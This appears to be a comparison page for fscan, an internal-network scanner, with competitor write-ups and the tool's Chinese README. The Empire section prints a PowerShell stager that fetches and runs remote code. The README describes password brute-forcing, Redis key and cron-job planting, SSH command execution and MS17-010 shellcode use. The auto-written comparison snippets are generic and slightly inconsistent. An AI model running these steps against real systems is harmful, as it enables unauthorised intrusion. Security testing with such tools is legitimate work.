Convert Figma logo to code with AI

shadow1ng logofscan

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

12,352
1,759
12,352
93

Top Related Projects

24,222

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

11,421

Nmap - the Network Mapper. Github mirror of official SVN repository.

24,604

TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

A Tool for Domain Flyovers

7,644

Empire is a PowerShell and Python post-exploitation agent.

E-mails, subdomains and names Harvester - OSINT

Quick Overview

fscan is an internal network scanning tool designed for penetration testing and security assessments. It combines multiple functionalities such as port scanning, service detection, brute-force attacks, and vulnerability exploitation into a single, efficient tool. The project aims to simplify and streamline the process of internal network reconnaissance and vulnerability discovery.

Pros

  • All-in-one solution for internal network scanning and exploitation
  • Fast and efficient, utilizing concurrent scanning techniques
  • Regularly updated with new features and vulnerability checks
  • Cross-platform support (Windows, Linux, Mac)

Cons

  • Potential for misuse if not handled responsibly
  • May trigger antivirus or intrusion detection systems
  • Limited documentation, especially for advanced features
  • Some features may require additional dependencies or configurations

Getting Started

To get started with fscan:

  1. Download the latest release from the GitHub repository.
  2. Extract the executable for your operating system.
  3. Open a terminal or command prompt and navigate to the directory containing the fscan executable.
  4. Run fscan with desired options:
# Basic scan of a single IP
./fscan -h 192.168.1.1

# Scan a network range with common ports
./fscan -h 192.168.1.1/24 -p 80,443,3306,3389,5432,6379,9200,11211,27017

# Full scan with all modules enabled
./fscan -h 192.168.1.1/24 -p 1-65535 -ap 1-65535 -vv -o results.txt

For more advanced usage and options, refer to the project's README and documentation on the GitHub repository.

Competitor Comparisons

24,222

Nuclei is a fast, customizable vulnerability scanner powered by the global security community and built on a simple YAML-based DSL, enabling collaboration to tackle trending vulnerabilities on the internet. It helps you find vulnerabilities in your applications, APIs, networks, DNS, and cloud configurations.

Pros of Nuclei

  • More extensive and customizable scanning capabilities with a large library of templates
  • Active community development and regular updates
  • Better documentation and integration with other security tools

Cons of Nuclei

  • Steeper learning curve due to its more complex template system
  • Potentially slower scanning speed for basic tasks compared to Fscan's lightweight approach

Code Comparison

Fscan (basic port scanning):

func ScanPort(ip string, port int) {
    address := fmt.Sprintf("%s:%d", ip, port)
    conn, err := net.DialTimeout("tcp", address, time.Second*2)
    if err == nil {
        conn.Close()
        fmt.Printf("Port %d is open\n", port)
    }
}

Nuclei (template-based scanning):

id: example-scan
info:
  name: Example Scan
  severity: info
requests:
  - method: GET
    path:
      - "{{BaseURL}}/example"
    matchers:
      - type: word
        words:
          - "Example Response"

The code comparison highlights the different approaches: Fscan uses direct Go code for basic port scanning, while Nuclei employs YAML-based templates for more flexible and customizable scans.

11,421

Nmap - the Network Mapper. Github mirror of official SVN repository.

Pros of nmap

  • Extensive feature set and flexibility for network scanning and discovery
  • Large, active community and ongoing development
  • Well-documented with comprehensive man pages and online resources

Cons of nmap

  • Steeper learning curve for beginners
  • Can be slower for large-scale scans compared to more specialized tools
  • Requires root/admin privileges for many scan types

Code comparison

nmap:

nmap -sV -sC -p- 192.168.1.0/24

fscan:

fscan.exe -h 192.168.1.1/24 -p 1-65535

Both tools allow for network scanning, but nmap offers more granular control over scan types and options, while fscan provides a simpler syntax for quick scans.

nmap is a comprehensive, well-established network scanning and discovery tool with a wide range of features and customization options. It's ideal for detailed network analysis and security assessments but may require more time to master.

fscan is a lightweight, fast scanner written in Go, designed for internal network scanning. It's easier to use for basic scans and may be quicker for large-scale scans, but lacks some of the advanced features and flexibility of nmap.

Choose nmap for in-depth network analysis and security testing, or fscan for quick and simple internal network scans.

24,604

TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes.

Pros of masscan

  • Extremely fast scanning capabilities, able to scan the entire Internet in under 6 minutes
  • Written in C, offering high performance and low-level control
  • Supports a wide range of scanning options and customization

Cons of masscan

  • Primarily focused on port scanning, lacking the broader functionality of fscan
  • May require more technical expertise to use effectively
  • Less actively maintained, with fewer recent updates compared to fscan

Code Comparison

masscan (C):

int
proto_banner1_tcp(
    struct Banner1 *banner1,
    struct ProtocolState *pstate,
    const unsigned char *px, size_t length,
    struct BannerOutput *banout,
    struct InteractiveData *more)
{
    // TCP protocol handling code
}

fscan (Go):

func (s *Scanner) TCPScan(ip string, port int, service string) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), s.Timeout)
    if err != nil {
        return
    }
    defer conn.Close()
    // Further scanning logic
}

The code snippets demonstrate the different approaches and languages used by each project. masscan's C implementation offers low-level control, while fscan's Go code provides a more high-level and readable structure.

A Tool for Domain Flyovers

Pros of Aquatone

  • Specialized in web-based reconnaissance and screenshot capture
  • Supports multiple input formats (URLs, Nmap XML, text files)
  • Generates comprehensive HTML reports with screenshots and clustering

Cons of Aquatone

  • Limited to web-based targets and doesn't perform broader network scanning
  • Requires external tools for full functionality (e.g., ChromeDriver)
  • Less actively maintained compared to Fscan

Code Comparison

Fscan (Go):

func (s *Scanner) TCPScan(ip string, port int) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err == nil {
        conn.Close()
        s.AddResult(ip, port, "open")
    }
}

Aquatone (Ruby):

def capture_screenshot(url, output_file)
  browser.navigate.to(url)
  browser.save_screenshot(output_file)
rescue => e
  @logger.error("Error capturing screenshot of #{url}: #{e}")
end

The code snippets highlight the different focus areas of each tool. Fscan performs TCP port scanning, while Aquatone captures web screenshots using a browser automation tool.

7,644

Empire is a PowerShell and Python post-exploitation agent.

Pros of Empire

  • More comprehensive post-exploitation framework with extensive modules
  • Active community and regular updates
  • Supports multiple communication protocols for C2

Cons of Empire

  • Larger footprint and more complex to set up and use
  • Higher likelihood of detection due to its popularity
  • Requires more resources to run effectively

Code Comparison

Empire (PowerShell stager):

$wc=New-Object System.Net.WebClient;$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko");$wc.Proxy=[System.Net.WebRequest]::DefaultWebProxy;$wc.Proxy.Credentials=[System.Net.CredentialCache]::DefaultNetworkCredentials;IEX $wc.DownloadString("http://empire.server/launcher");

fscan (Go scanner function):

func (s *Scanner) ScanPort(ip string, port int) (result string, err error) {
    conn, err := net.DialTimeout("tcp", fmt.Sprintf("%s:%d", ip, port), time.Duration(s.Timeout)*time.Second)
    if err != nil {
        return "", err
    }
    defer conn.Close()
    return fmt.Sprintf("%s:%d open", ip, port), nil
}

Summary

Empire is a more comprehensive post-exploitation framework with extensive capabilities, while fscan is a lightweight, focused network scanner. Empire offers more features but is more complex, while fscan is simpler and easier to use for specific scanning tasks. The choice between them depends on the specific requirements of the security assessment or penetration testing scenario.

E-mails, subdomains and names Harvester - OSINT

Pros of theHarvester

  • More comprehensive OSINT gathering capabilities, including email harvesting and domain information collection
  • Supports a wider range of search engines and data sources
  • Actively maintained with regular updates and contributions from the community

Cons of theHarvester

  • Primarily focused on information gathering, lacking the extensive vulnerability scanning features of fscan
  • May require additional tools for a complete security assessment
  • Can be slower when performing extensive searches across multiple data sources

Code Comparison

theHarvester:

from theHarvester.lib.core import *
from theHarvester.discovery import *

search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()

fscan:

func (s *Scanner) TCPScan(ip string, ports []int) {
    for _, port := range ports {
        s.ScanPort(ip, port)
    }
}

The code snippets highlight the different focus areas of each tool. theHarvester emphasizes OSINT gathering through search engines, while fscan concentrates on network scanning and vulnerability assessment.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

Fscan

English

0x01 简介

一款内网综合扫描工具,方便一键自动化、全方位漏扫扫描。

0x02 主要功能

1. 信息搜集

  • 基于ICMP的主机存活探测:快速识别网络中的活跃主机设备
  • 全面的端口扫描:系统地检测目标主机的开放端口情况

2. 爆破功能

  • 常用服务密码爆破:支持SSH、SMB、RDP等多种协议的身份认证测试
  • 数据库密码爆破:覆盖MySQL、MSSQL、Redis、PostgreSQL、Oracle等主流数据库系统

3. 系统信息与漏洞扫描

  • 网络信息收集:包括NetBIOS探测和域控制器识别
  • 系统信息获取:能够读取目标系统网卡配置信息
  • 安全漏洞检测:支持MS17-010等高危漏洞的识别与检测

4. Web应用探测

  • 网站信息收集:自动获取网站标题信息
  • Web指纹识别:可识别常见CMS系统与OA框架
  • 漏洞扫描能力:集成WebLogic、Struts2等漏洞检测,兼容XRay POC

5. 漏洞利用模块

  • Redis利用:支持写入公钥或植入计划任务
  • SSH远程执行:提供SSH命令执行功能
  • MS17-010利用:支持ShellCode注入,可实现添加用户等操作

6. 辅助功能

  • 扫描结果存储:将所有检测结果保存至文件,便于后续分析

0x03 使用说明

完整功能介绍、使用说明及最新更新请访问我们的官方网站。

官方网站

https://fscan.club/

访问官网获取:

  • 详细功能文档
  • 使用教程
  • 最新版本下载
  • 常见问题解答
  • 技术支持

编译说明

# 基础编译
go build -ldflags="-s -w" -trimpath main.go

# UPX压缩(可选)
upx -9 fscan

系统安装

# Arch Linux
yay -S fscan-git
# 或
paru -S fscan-git

0x04 运行截图

fscan.exe -h 192.168.x.x (全功能、ms17010、读取网卡信息)

fscan.exe -h 192.168.x.x -rf id_rsa.pub (redis 写公钥)

fscan.exe -h 192.168.x.x -c "whoami;id" (ssh 命令)

fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 一键支持xray的poc

fscan.exe -h 192.168.x.x -p 139 (netbios探测、域控识别,下图的[+]DC代表域控)

go run .\main.go -h 192.168.x.x/24 -m netbios(-m netbios时,才会显示完整的netbios信息)

go run .\main.go -h 192.0.0.0/8 -m icmp(探测每个C段的网关和数个随机IP,并统计top 10 B、C段存活数量) img.png

新的展示

2.0-1

2.0-2

0x05 免责声明

本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。

为避免被恶意使用,本项目所有收录的poc均为漏洞的理论判断,不存在漏洞利用过程,不会对目标发起真实攻击和漏洞利用。

在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。

如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。

在安装并使用本工具前,请您务必审慎阅读、充分理解各条款内容,限制、免责条款或者其他涉及您重大权益的条款可能会以加粗、加下划线等形式提示您重点注意。

除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。

0x06 404StarLink 2.0 - Galaxy

fscan 是 404Team 星链计划2.0 中的一环,如果对fscan 有任何疑问又或是想要找小伙伴交流,可以参考星链计划的加群方式。

演示视频【安全工具】5大功能,一键化内网扫描神器——404星链计划fscan

0x07 Star Chart

Stargazers over time

0x08 捐赠

如果你觉得这个项目对你有帮助,你可以请作者喝饮料🍹 点我

0x09 安全培训

img.png 学网络安全,就选玲珑安全!专业漏洞挖掘,精准定位风险;助力技能提升,塑造安全精英;玲珑安全,为您的数字世界保驾护航!
在线免费学习网络安全,涵盖src漏洞挖掘,0基础安全入门。适用于小白,进阶,高手: https://space.bilibili.com/602205041
玲珑安全往期学员报喜🎉: https://www.ifhsec.com/list.html
玲珑安全漏洞挖掘培训学习联系微信: linglongsec

0x10 参考链接

https://github.com/Adminisme/ServerScan
https://github.com/netxfly/x-crack
https://github.com/hack2fun/Gscan
https://github.com/k8gege/LadonGo
https://github.com/jjf012/gopoc